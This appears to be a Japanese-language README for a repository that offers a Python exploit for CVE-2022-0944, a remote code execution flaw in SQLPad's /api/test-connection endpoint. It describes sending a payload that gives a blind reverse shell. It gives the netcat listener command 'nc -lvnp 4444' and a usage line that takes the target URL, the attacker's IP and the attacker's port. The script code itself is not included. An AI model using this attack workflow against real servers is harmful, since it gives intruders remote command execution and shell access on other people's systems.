
CVE-2022-0944のPythonエクスプロイトで、SQLPadの/api/test-connectionエンドポイントを介してnetcatコールバックでブラインドリモートコード実行を可能にします。
このリポジトリには、SQLPad の CVE-2022-0944 に関するエクスプロイトスクリプトが含まれています。この脆弱性は、/api/test-connection エンドポイントを介したリモートコード実行 (RCE) を可能にします。
提供されたスクリプト (exploit.py) は、SQLPad の RCE 脆弱性を悪用する方法を示しています。このスクリプトは、脆弱なエンドポイントにペイロードを送信し、ターゲットサーバー上でコマンドを実行します。
requests ライブラリ (pip でインストール可能)nc -lvnp 4444
エクスプロイトを実行する
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>